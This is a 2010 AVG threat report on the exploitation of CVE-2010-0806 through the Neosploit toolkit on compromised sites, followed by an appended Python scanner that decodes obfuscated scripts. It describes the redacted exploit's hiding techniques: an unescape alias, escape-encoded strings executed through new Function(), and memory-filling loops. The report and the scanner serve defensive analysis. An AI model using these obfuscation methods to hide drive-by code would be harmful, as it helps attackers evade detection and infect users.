8/9/2019 AVG Web Intelligence
1/9
AVG
WEB INTELLIGENCE REPORT
APRIL 2010
THE EPIDEMIC OF CVE-2010-0806 FOLLOWING A PUBLIC DISCLOSURE
Introduction

Cybercriminals keep on targeting innocent online users. They refine their methods and search for new ways to maximize their illegal profit while minimizing their chance of detection. In this report, we will show you how hackers managed to infect computers with their malware while taking advantage of an unpatched Internet Explorer vulnerability (zero-day) that was disclosed to the public. We will expose the epidemic of this zero-day vulnerability on the web and the impact it has on users browsing the web without protection.

Our research shows that the public disclosure of information about an unpatched vulnerability (zero-day) leads to a swift response by hackers. The disclosed information was embedded in an exploit toolkit known as Neosploit and used by several cybercriminal gangs around the globe. The Neosploit exploit toolkit is software written by hackers and sold online to cybercriminals, who use it to infect innocent web users with their malware. The toolkit includes everything the cybercriminal needs to operate an attack: the malware, the exploit code, the statistics reports, etc.

How did these cybercriminals find the information about the unpatched vulnerability? What means and methods did they use to infect users? What is the epidemic rate of this attack? What can users do to protect their digital assets?

In this report, we will shed some light on these questions, including the cybercrime toolkits they used.
CVE-2010-0806 and Public Disclosure

On March 9th Microsoft released an advisory regarding a vulnerability in its Internet Explorer products, versions 6 and 7. According to the information provided in this advisory, the vulnerability could allow remote code execution (RCE). RCE means that an attacker who successfully exploits this vulnerability could gain the same user rights as the logged-on user. For example, if the user is logged on with administrative user rights, an attacker who successfully exploits this vulnerability could take complete control of an infected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Following the Microsoft advisory, CVE-2010-0806 was published to alert the public about the existence of this vulnerability. Typically, public vulnerability disclosures trigger security researchers to rush in and find out what is under the hood. The race to find where exactly the vulnerability lies and how to exploit it was the obvious next step. The race ended with a report from a security researcher who found a site already exploiting this vulnerability and used it to create a public Proof-of-Concept (PoC) and a module for the popular open source penetration testing platform, Metasploit.

The debate as to whether such public disclosure is valuable to the security community or not has been around for years. Some claim it helps the community to provide immediate protection against threats, while others claim it helps cybercriminals to trigger their attacks. We believe responsible disclosure in the security community is the better way to go.
The Vulnerability as Detected by AVG

Not long after the PoC was published on the web, AVG spotted a major spike in compromised websites serving exploit code targeting the zero-day vulnerability. We concluded in our research that the exploit is being served by an exploit toolkit dubbed Neosploit. Neosploit has been known for some time already; however, its price on the black market started to decline because of the relatively old vulnerabilities it tries to exploit. It appears that the people behind Neosploit added this new exploit to its arsenal to increase its market price again.
[Chart: Number of exploit-serving websites following the public disclosure. X axis: Days from MS Advisory (1 to 8); Y axis: Number of Hits (0 to 30,000).]
Example of Compromised Website Serving the Exploit

Many users believe they can tell if a website is a legitimate one or a malicious one just by visiting it. There are two false assumptions behind this statement:
1. Today's malicious code is invisible to users. Usually it is code embedded in the web page that executes behind the scenes while the user just visits the web page. This is known as a drive-by download.
2. Hackers are compromising legitimate websites and inserting their malicious code into them. The reason is simple: users visit legitimate sites more often than other sites.
Below is an example of a compromised website we spotted that automatically attempts to infect the user with an exploit. Can you tell if this site is legitimate or one that serves malicious code? Probably not.
Here is the code behind this web page.

As you can see at the bottom of the page, the hacker who compromised this website inserted code that tries to infect the user; this was probably not part of the original code the website owner wanted to have. For security researchers the highlighted code is very common, but for the average web developer it will look suspicious or unknown.

In order to minimize detection of the exploit code by security products, the hackers tried to hide their actions. The served exploit code in this example was obfuscated. The main reason for obfuscating the code is to avoid detection by the traditional signature-matching techniques used by security products.
[Figure: screenshot of the obfuscated exploit script served by the compromised page, partially redacted by the report's authors ("[REMOVED]"). The legible fragments show an alias for unescape(), strings stored as %XX and %uXXXX escapes (decoding to, among others, "document" and "createElement") that are decoded and executed through new Function(), and a while loop that fills an array with large memory blocks.]
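The report's point about obfuscation is that a signature written for the plain text of the script never matches the percent-encoded form. The following Python scanner is an added illustration of how a defender answers that; it is not AVG's code and not from the report. It decodes %XX and %uXXXX escapes the way JavaScript's legacy unescape() does, repeats while new escapes keep appearing (layered encoding), measures how much of the script is escape sequences, and reports API names that only become visible after decoding. The token list and the sample scripts are constructed for the example.

```python
"""Layered percent-decoding scanner for obfuscated inline scripts.

Added illustration, not the report's or AVG's code. Decodes %XX and %uXXXX
escapes like JavaScript's unescape(), repeats while escapes keep appearing,
and flags API names that signature scanners miss when present only encoded.
"""
import re
from typing import Dict, List, Tuple

# API names a drive-by script typically needs once decoded. This list is an
# assumption for the example, not a vendor signature set.
SUSPICIOUS_TOKENS: Tuple[str, ...] = (
    "unescape(", "eval(", "new Function(", "document.write(",
    "createElement(", "fromCharCode(",
)

# %uXXXX (UTF-16 code unit) or %XX (single byte), as unescape() accepts them.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(text: str) -> str:
    """Decode one layer of %XX / %uXXXX sequences like JavaScript's unescape()."""
    def repl(m: "re.Match[str]") -> str:
        hex_digits = m.group(1) if m.group(1) else m.group(2)
        return chr(int(hex_digits, 16))
    return _ESC.sub(repl, text)


def deobfuscate(text: str, max_layers: int = 5) -> Tuple[str, int]:
    """Decode repeatedly until no escapes remain; returns (decoded, layers_removed).

    max_layers bounds the loop so a script that keeps producing '%' never spins.
    """
    layers = 0
    while layers < max_layers and _ESC.search(text):
        text = js_unescape(text)
        layers += 1
    return text, layers


def encoded_ratio(text: str) -> float:
    """Fraction of the script taken up by escape sequences; high values are a red flag."""
    if not text:
        return 0.0
    encoded_chars = sum(len(m.group(0)) for m in _ESC.finditer(text))
    return encoded_chars / len(text)


def scan_script(script: str) -> Dict[str, object]:
    """Report decoding depth, encoded ratio, and tokens hidden by the encoding."""
    decoded, layers = deobfuscate(script)
    ratio = encoded_ratio(script)
    # A token counts as "hidden" only if it is absent from the raw script but
    # present after decoding: that is exactly what defeats a plain-text signature.
    hidden: List[str] = [t for t in SUSPICIOUS_TOKENS if t in decoded and t not in script]
    return {
        "layers": layers,
        "encoded_ratio": round(ratio, 2),
        "hidden_tokens": hidden,
        "suspicious": bool(hidden) or ratio > 0.5,
    }


# Constructed sample: "document.write("hi")" stored as %XX escapes and run via new Function.
OBFUSCATED_SAMPLE = (
    'var s = unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%68%69%22%29");'
    ' new Function(s)();'
)
# Constructed sample with the same call written in the clear.
PLAIN_SAMPLE = 'document.write("hi")'

if __name__ == "__main__":
    for name, sample in (("obfuscated", OBFUSCATED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(name, scan_script(sample))
```

The ratio threshold and the token list are tuning knobs; in practice a scanner would also look at the decoded text with the same signatures it applies to plain scripts, which is the whole reason for decoding first.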